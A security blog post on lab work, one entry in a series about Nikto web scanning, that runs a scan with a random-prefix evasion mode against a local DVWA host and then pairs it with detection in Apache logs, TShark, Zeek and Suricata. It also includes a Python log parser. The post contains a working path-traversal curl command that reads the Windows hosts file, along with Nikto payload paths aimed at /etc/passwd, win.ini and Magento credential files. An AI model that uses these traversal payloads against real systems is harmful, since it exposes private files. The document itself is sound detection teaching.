Tuesday, December 12, 2023

Beginning Nikto - Remote File Retrieval with evasion type 4 -> Prepend long random string

This post is part of a series on learning more about Nikto and web application scanning from the perspectives of both the hack and its detection.

From the hacking perspective, Nikto is the tool used. From the detection perspective, the tools and/or processes used for the network forensics are log analysis, TShark, Zeek and Suricata.

The Hack - Remote File Retrieval with evasion type 4 -> Prepend long random string

┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_5]
└─$ nikto -host http://10.0.0.106 -ipv4 -Display 1 --ask no -Format json -o /tmp/nikto.json -nossl -no404 -Tuning 5 -evasion 4
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          10.0.0.106
+ Target Hostname:    10.0.0.106
+ Target Port:        80
+ Using Encoding:     Prepend long random string
+ Start Time:         2023-06-06 15:13:18 (GMT-4)
---------------------------------------------------------------------------
...
+ /index.php?download=/winnt/win.ini - Redirects (302) to http://10.0.0.106/dashboard/ , Snif 1.2.4 allows any file to be retrieved from the web server.
+ /index.php?download=/windows/win.ini - Redirects (302) to http://10.0.0.106/dashboard/ , Snif 1.2.4 allows any file to be retrieved from the web server.
+ /index.php?download=/etc/passwd - Redirects (302) to http://10.0.0.106/dashboard/ , Snif 1.2.4 allows any file to be retrieved from the web server.
+ /index.php?|=../../../../../../../../../etc/passwd - Redirects (302) to http://10.0.0.106/dashboard/ , Portix-PHP Portal allows retrieval of arbitrary files via the '..' type filtering problem.
+ /index.php?page=../../../../../../../../../../etc/passwd - Redirects (302) to http://10.0.0.106/dashboard/ , The PHP-Nuke Rocket add-in is vulnerable to file traversal, allowing an attacker to view any file on the host. (probably Rocket, but could be any index.php)
...
+ 925 requests: 0 error(s) and 6 item(s) reported on remote host
+ End Time:           2023-06-06 15:13:20 (GMT-4) (2 seconds)
---------------------------------------------------------------------------

Everything above returns a 302. Hence I'm concluding this test was not successful.

Besides, we already learned previously that index.php does not have a parameter named "page", and there is none named "download". More importantly, /etc/passwd is found on Linux, not Windows, so those results are not valid for this purpose.

Leveraging my knowledge of the DVWA app, I will actually exploit this. Rather than using the web application directly, I will use curl to attempt to read the "c:\windows\system32\drivers\etc\hosts" file.

If we inspect the page, we see a "page" parameter. By default, its value is "include.php".

http://10.0.0.106/dvwa/vulnerabilities/fi/?page=include.php

Using curl:

┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_5]
└─$ curl --request GET --location "http://10.0.0.106/dvwa/vulnerabilities/fi/?page=../../../../../../windows/system32/drivers/etc/hosts"                                                                                               
# Copyright (c) 1993-2009 Microsoft Corp.
# ...
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a '#' symbol.
#
# For example:
#
#      102.54.94.97     rhino.acme.com          # source server
#       38.25.63.10     x.acme.com              # x client host

# localhost name resolution is handled within DNS itself.
#       127.0.0.1       localhost
#       ::1             localhost
10.0.0.107 mycooldomain.cdw
<!DOCTYPE html>

<html lang="en-GB">

        <head>
                <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />

                <title>Vulnerability: File Inclusion :: Damn Vulnerable Web Application (DVWA)</title>
...

Above, just before the original page loads, we can see the contents of the hosts file.

Transitioning to log analysis.

Detect - Log Analysis

Looking at the first entry in the access.log, we see a large set of random characters prepended to the query.

┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_5]
└─$ cat access.log | head -1
10.0.0.107 - - [06/Jun/2023:15:12:49 -0400] "GET /P4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmv/../ HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"

Looking for something meaningful: entries where the response code is 200.

┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_5]
└─$ cat access.log | grep --perl-regexp "\s+200\s+"
10.0.0.107 - - [06/Jun/2023:15:12:50 -0400] "GET /0RHy...JUNK...EkwGH/../favicon.ico HTTP/1.1" 200 30894 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
10.0.0.107 - - [06/Jun/2023:15:12:51 -0400] "OPTIONS * HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
10.0.0.107 - - [06/Jun/2023:15:12:51 -0400] "TRACE /eaXa8sc4...JUNK...Wlt5N/../ HTTP/1.0" 200 721 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"

Nothing meaningful above. What else is there?

Looking at the paths. How many were there?

┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_5]
└─$ cat access.log | grep --perl-regexp "\.\..*?HTTP" --only-matching | \
sort --unique | awk --field-separator="HTTP" '{ print $1 }' | wc --lines                                                                                       
667

Getting a snapshot of some of these.

┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_5]
└─$ cat access.log | grep --perl-regexp "\.\..*?HTTP" --only-matching | sort --unique | \
awk --field-separator="HTTP" '{ print $1 }'  
./0.alz 
../0.cer 
../0.egg
...
../autohtml.php?op=modload&mainfile=x&name=/etc/passwd 
../backup.alz 
...
./cgi-bin/generate.cgi?content=../../../../../../../../../../etc/passwd%00board=board_1 
../cgi-bin/generate.cgi?content=../../../../../../../../../../windows/win.ini%00board=board_1 
../cgi-bin/generate.cgi?content=../../../../../../../../../../winnt/win.ini%00board=board_1 
../cgi-bin/guestbook.cgi 
../cgi-bin/helpdesk.cgi 
../cgi-bin/hsx.cgi?show=../../../../../../../../../../../etc/passwd%00 
../cgi-bin/htgrep?file=index.html&hdr=/etc/passwd 
../cgi-bin/htmlscript?../../../../../../../../../../etc/passwd 
../cgi-bin/htsearch?exclude=%60/etc/passwd%60 
...
../cgi-bin/input2.bat?|dir%20..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\ 
../cgi-bin/input.bat?|dir%20..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\
...
./magento/magmi-importer/web/ajax_pluginconf.php?file=../../../../../../../../../../../etc/passwd&plugintype=utilities&pluginclass=CustomSQLUtility 
../magento/magmi-importer/web/download_file.php?file=../../app/etc/local.xml 
../magento/magmi-importer/web/download_file.php?file=../../../../../../../../../../../etc/passwd 
../magento/magmi/web/ajax_pluginconf.php?file=../../../../../../../../../../../etc/passwd&plugintype=utilities&pluginclass=CustomSQLUtility 
...

Moving on to what an actual attack looks like. As we already know from above, there were only 2 entries that returned response code 200.

What does the log look like for an actual successful attack?

10.0.0.107 - - [07/Jun/2023:14:36:24 -0400] "GET /dvwa/vulnerabilities/fi/?page=../../../../../../windows/system32/drivers/etc/hosts HTTP/1.1" 200 4005 "-" "curl/7.88.1"

At this point, we need to review the system to see if that file exists. If it does, then you have to wonder what information was exposed. Do note that all systems tend to have a hosts file, and Windows definitely has it in that location. Maybe the packet analysis will help add more clarity.
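As an added example (not code from the original post), a small Python parser that applies the log-analysis logic above to constructed access.log lines: it recognises the evasion-4 prefix (a long random segment followed by /../), strips it so traversal detection sees the request the way the server resolved it, and lists the traversal attempts that were answered with 200. The sample lines and the 24-character prefix floor are assumptions.

```python
import re
from collections import Counter

# Constructed sample lines modelled on the access.log entries shown above (not real captures).
SAMPLE_LOG = """\
10.0.0.107 - - [06/Jun/2023:15:12:49 -0400] "GET /P4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmv/../ HTTP/1.1" 302 - "-" "Mozilla/5.0"
10.0.0.107 - - [06/Jun/2023:15:12:50 -0400] "GET /0RHyAbCdEfGhIjKlMnOpQrStUvWxYz0123456789EkwGH/../favicon.ico HTTP/1.1" 200 30894 "-" "Mozilla/5.0"
10.0.0.107 - - [06/Jun/2023:15:12:51 -0400] "OPTIONS * HTTP/1.1" 200 - "-" "Mozilla/5.0"
10.0.0.107 - - [06/Jun/2023:15:12:52 -0400] "GET /Q7vLp0sZ2mKc9TxWb4nHd8RfYe1GuJa3Oi6/../index.php?page=../../../../../../../../../../etc/passwd HTTP/1.1" 302 - "-" "Mozilla/5.0"
10.0.0.107 - - [07/Jun/2023:14:36:24 -0400] "GET /dvwa/vulnerabilities/fi/?page=../../../../../../windows/system32/drivers/etc/hosts HTTP/1.1" 200 4005 "-" "curl/7.88.1"
10.0.0.1 - - [07/Jun/2023:14:40:00 -0400] "GET /dvwa/index.php HTTP/1.1" 200 1200 "-" "Mozilla/5.0"
"""

# Apache combined log format, as written by the Apache server used in this series.
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<uri>\S+) (?P<proto>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)
# Nikto evasion 4: a long random alphanumeric segment followed by "/../", which the
# server collapses before resolving the real path. The 24-char floor is an assumption.
EVASION_RE = re.compile(r"^/[A-Za-z0-9]{24,}/\.\./")
# Traversal in what remains: plain, backslash or URL-encoded dot-dot sequences.
TRAVERSAL_RE = re.compile(r"(\.\.|%2e%2e)(/|\\|%2f|%5c)", re.IGNORECASE)

def parse_line(line):
    """Parse one log line; return None for lines that do not match the format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    rec["evasion"] = bool(EVASION_RE.match(rec["uri"]))
    # Strip the junk prefix so detection sees the request as the server resolved it.
    rec["norm_uri"] = EVASION_RE.sub("/", rec["uri"])
    rec["traversal"] = bool(TRAVERSAL_RE.search(rec["norm_uri"]))
    return rec

def analyse(log_text):
    return [r for r in (parse_line(l) for l in log_text.splitlines()) if r]

def successful_traversals(records):
    """Traversal attempts answered with 200: the ones that warrant a host-side check."""
    return [r for r in records if r["traversal"] and r["status"] == 200]

def evasion_sources(records):
    """Evasion-prefixed requests per client; a burst of them is the scanner, not a user."""
    return Counter(r["src"] for r in records if r["evasion"])

if __name__ == "__main__":
    recs = analyse(SAMPLE_LOG)
    print("evasion-prefixed requests by source:", dict(evasion_sources(recs)))
    for r in successful_traversals(recs):
        print(f"{r['ts']} {r['src']} {r['method']} {r['norm_uri']} -> {r['status']} ({r['ua']})")
```

Run against a real access.log by reading the file into analyse(); the favicon request is correctly dropped because, once the prefix is removed, nothing traversal-like remains.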


Detect - Packet Analysis

Setup for packet analysis: capture packets on ports 80 and 443.

Get the streams where the response code was 200.


┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_5]
└─$ tshark -n -r tuning_5.pcap -Y 'http.response.code == 200' -T fields -e ip.src -e ip.dst -e tcp.srcport -e tcp.stream -e tcp.len -E header=y                                                                                        
ip.src  ip.dst  tcp.srcport     tcp.stream      tcp.len
10.0.0.106      10.0.0.107      80      4       549
10.0.0.106      10.0.0.107      80      8       187
10.0.0.106      10.0.0.107      80      9       0

Looking at stream 4, we see it is the favicon.

┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_5]
└─$ tshark -n -r tuning_5.pcap -q -z follow,tcp,ascii,4 | grep --perl-regexp "\s+200\s+" --before-context=7  --after-context=10                                                                                                        
GET /0RHy...JUNK...kwGH/../favicon.ico HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Host: 10.0.0.106
Connection: Keep-Alive


        1460
HTTP/1.1 200 OK
Date: Tue, 06 Jun 2023 19:12:50 GMT
Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
Last-Modified: Thu, 16 Jul 2015 15:32:32 GMT
ETag: "78ae-51affc7a4c400"
Accept-Ranges: bytes
Content-Length: 30894
Keep-Alive: timeout=5, max=48
Connection: Keep-Alive
Content-Type: image/x-icon

Detecting the actual attack via packet analysis.

┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_5]
└─$ tshark -n -r fi.pcap 
    1 0.000000000   10.0.0.107 → 10.0.0.106   TCP 74 59456 → 80 [SYN] Seq=0 Win=64240 Len=0 MSS=1460 SACK_PERM TSval=1949226976 TSecr=0 WS=128
    2 0.000252977   10.0.0.106 → 10.0.0.107   TCP 66 80 → 59456 [SYN, ACK] Seq=0 Ack=1 Win=65535 Len=0 MSS=1460 WS=256 SACK_PERM
    3 0.000288567   10.0.0.107 → 10.0.0.106   TCP 54 59456 → 80 [ACK] Seq=1 Ack=1 Win=64256 Len=0
    4 0.000369486   10.0.0.107 → 10.0.0.106   HTTP 210 GET /dvwa/vulnerabilities/fi/?page=../../../../../../windows/system32/drivers/etc/hosts HTTP/1.1 
    5 0.009548711   10.0.0.106 → 10.0.0.107   TCP 1514 HTTP/1.1 200 OK  [TCP segment of a reassembled PDU]
    6 0.009548962   10.0.0.106 → 10.0.0.107   TCP 1514 80 → 59456 [ACK] Seq=1461 Ack=157 Win=2102272 Len=1460 [TCP segment of a reassembled PDU]
    7 0.009548998   10.0.0.106 → 10.0.0.107   TCP 1514 80 → 59456 [ACK] Seq=2921 Ack=157 Win=2102272 Len=1460 [TCP segment of a reassembled PDU]
    8 0.009549028   10.0.0.106 → 10.0.0.107   HTTP 125 HTTP/1.1 200 OK  (text/html)
    9 0.009599451   10.0.0.107 → 10.0.0.106   TCP 54 59456 → 80 [ACK] Seq=157 Ack=1461 Win=64128 Len=0
   10 0.009615795   10.0.0.107 → 10.0.0.106   TCP 54 59456 → 80 [ACK] Seq=157 Ack=2921 Win=63488 Len=0
   11 0.009623869   10.0.0.107 → 10.0.0.106   TCP 54 59456 → 80 [ACK] Seq=157 Ack=4381 Win=62592 Len=0
   12 0.009635647   10.0.0.107 → 10.0.0.106   TCP 54 59456 → 80 [ACK] Seq=157 Ack=4452 Win=62592 Len=0
   13 0.011856522   10.0.0.107 → 10.0.0.106   TCP 54 59456 → 80 [FIN, ACK] Seq=157 Ack=4452 Win=64128 Len=0
   14 0.012227611   10.0.0.106 → 10.0.0.107   TCP 60 80 → 59456 [ACK] Seq=4452 Ack=158 Win=2102272 Len=0
   15 0.012227889   10.0.0.106 → 10.0.0.107   TCP 60 80 → 59456 [FIN, ACK] Seq=4452 Ack=158 Win=2102272 Len=0
   16 0.012271428   10.0.0.107 → 10.0.0.106   TCP 54 59456 → 80 [ACK] Seq=158 Ack=4453 Win=64128 Len=0

How many conversations were part of this communication?

┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_5]
└─$ tshark -n -r fi.pcap -q -z conv,tcp
================================================================================
TCP Conversations
Filter:<No Filter>
                                                           |       <-      | |       ->      | |     Total     |    Relative    |   Duration   |
                                                           | Frames  Bytes | | Frames  Bytes | | Frames  Bytes |      Start     |              |
10.0.0.107:59456           <-> 10.0.0.106:80                    7 4,853 bytes       9 662 bytes      16 5,515 bytes     0.000000000         0.0123
================================================================================

Following stream 0.

┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_5]
└─$ tshark -n -r fi.pcap -q -z follow,tcp,ascii,0

===================================================================
Follow: tcp,ascii
Filter: tcp.stream eq 0
Node 0: 10.0.0.107:59456
Node 1: 10.0.0.106:80
156
GET /dvwa/vulnerabilities/fi/?page=../../../../../../windows/system32/drivers/etc/hosts HTTP/1.1
Host: 10.0.0.106
User-Agent: curl/7.88.1
Accept: */*


        1460
HTTP/1.1 200 OK
Date: Wed, 07 Jun 2023 18:36:24 GMT
Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
X-Powered-By: PHP/8.0.28
Set-Cookie: security=low; path=/
Set-Cookie: PHPSESSID=vba6pa2had7c86op2lnluit7v5; expires=Thu, 08-Jun-2023 18:36:24 GMT; Max-Age=86400; path=/
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Length: 4005
Content-Type: text/html;charset=utf-8

# Copyright (c) 1993-2009 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a '#' symbol.
#
# For example:
#
#      102.54.94.97     rhino.acme.com          # source server
#       38.25.63.10     x.acme.com              # x client host

# localhost name resolution is handled within DNS itself.
#.127.0.0.1       localhost
#.::1             localhost
10.0.0.107 mycooldomain.cdw
<!DOCTYPE html>

The packet analysis confirms our log analysis findings. The file was successfully retrieved, hence we see its full contents above. As we say in SANS SEC503 - Network Monitoring and Threat Detection: packets or it did not happen. This is clear evidence of that.

Transitioning to Zeek.

Detect - Zeek Analysis

Set up Zeek.

┌──(kali㉿securitynik)-[~/nikto_stuff/zeek_stuff]
└─$ sudo zeek --iface any --no-checksums

┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_5]
└─$ cat http.log | grep --perl-regexp "\s+200\s+" | head --lines=1                                                                                                                                                                     
1686078799.407770       C0NrKC2wb8TbvK0iZb      10.0.0.107      39234   10.0.0.106      80      53      GET     10.0.0.106      /0RHy...JUNK...wGH/../favicon.ico      -       1.1     Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36    -       0       30894   200     OK      -       -       (empty) -       -       -       -       -       -       F0bkFD4SgqIlRoiaQf     -       image/x-icon

Looking at the actual attack traffic, we see something similar to what we saw in our log analysis of the access.log file.

┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_5]
└─$ cat http.log  

1686163005.810950       C7ccD83WRZobza0Lj9      10.0.0.107      59456   10.0.0.106      80      1       GET     10.0.0.106      /dvwa/vulnerabilities/fi/?page=../../../../../../windows/system32/drivers/etc/hosts     -       1.1   curl/7.88.1      -       0       4005    200     OK 

Detect - Suricata (IDS) Analysis

Set up Suricata to operate in IDS mode.

┌──(kali㉿securitynik)-[/var/log/suricata]
└─$ sudo suricata -c /etc/suricata/suricata.yaml -s /var/lib/suricata/rules/suricata.rules -i eth0 -l /var/log/suricata/ --simulate-ips -k all


What did the IDS produce? Looking at the first 5 entries, sorted by count.

┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_5]
└─$ cat fast.log | cut --fields=3 --delimiter='[' | sort | uniq --count | sort --numeric-sort --reverse | head --lines=5                                                                                                               
    120 1:2022028:2] ET WEB_SERVER Possible CVE-2014-6271 Attempt 
     16 1:2018056:4] ET WEB_SERVER Possible XXE SYSTEM ENTITY in POST BODY. 
      6 1:2021951:3] ET EXPLOIT Possible Magento Directory Traversal Attempt 
      4 1:2101402:9] GPL EXPLOIT iissamples access 
      4 1:2101245:13] GPL EXPLOIT ISAPI .idq access 

Nothing above that I would like to dig deeper into.

Looking at the actual attack from the IDS perspective.

┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_5]
└─$ cat fast.log 
06/07/2023-14:36:45.810950  [**] [1:2009362:7] ET WEB_SERVER /system32/ in Uri - Possible Protected Directory Access Attempt [**] [Classification: Attempted Information Leak] [Priority: 2] {TCP} 10.0.0.107:59456 -> 10.0.0.106:80

Looking at the packet.

┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_5]
└─$ cat alert-debug.log 
+================
TIME:              06/07/2023-14:36:45.810950
PKT SRC:           wire/pcap
SRC IP:            10.0.0.107
DST IP:            10.0.0.106
PROTO:             6
SRC PORT:          59456
DST PORT:          80
TCP SEQ:           2738297529
TCP ACK:           2364260716
FLOW:              to_server: TRUE, to_client: FALSE
FLOW Start TS:     06/07/2023-14:36:45.810580
FLOW PKTS TODST:   3
FLOW PKTS TOSRC:   1
FLOW Total Bytes:  404
FLOW IPONLY SET:   TOSERVER: TRUE, TOCLIENT: TRUE
FLOW ACTION:       DROP: FALSE
FLOW NOINSPECTION: PACKET: FALSE, PAYLOAD: FALSE, APP_LAYER: FALSE
FLOW APP_LAYER:    DETECTED: TRUE, PROTO 1
PACKET LEN:        210
PACKET:
 0000  08 00 27 88 B8 34 08 00  27 DB 96 6A 08 00 45 00   ..'..4.. '..j..E.
 0010  00 C4 75 E1 40 00 40 06  AF 7E 0A 00 00 6B 0A 00   ..u.@.@. .~...k..
 0020  00 6A E8 40 00 50 A3 37  1A B9 8C EB C1 6C 50 18   .j.@.P.7 .....lP.
 0030  01 F6 15 8B 00 00 47 45  54 20 2F 64 76 77 61 2F   ......GE T /dvwa/
 0040  76 75 6C 6E 65 72 61 62  69 6C 69 74 69 65 73 2F   vulnerab ilities/
 0050  66 69 2F 3F 70 61 67 65  3D 2E 2E 2F 2E 2E 2F 2E   fi/?page =../../.
 0060  2E 2F 2E 2E 2F 2E 2E 2F  2E 2E 2F 77 69 6E 64 6F   ./../../ ../windo
 0070  77 73 2F 73 79 73 74 65  6D 33 32 2F 64 72 69 76   ws/syste m32/driv
 0080  65 72 73 2F 65 74 63 2F  68 6F 73 74 73 20 48 54   ers/etc/ hosts HT
 0090  54 50 2F 31 2E 31 0D 0A  48 6F 73 74 3A 20 31 30   TP/1.1.. Host: 10
 00A0  2E 30 2E 30 2E 31 30 36  0D 0A 55 73 65 72 2D 41   .0.0.106 ..User-A
 00B0  67 65 6E 74 3A 20 63 75  72 6C 2F 37 2E 38 38 2E   gent: cu rl/7.88.
 00C0  31 0D 0A 41 63 63 65 70  74 3A 20 2A 2F 2A 0D 0A   1..Accep t: */*..
 00D0  0D 0A                                              ..
...

Nothing else to look at here.

Hope you enjoyed the posts in this series:
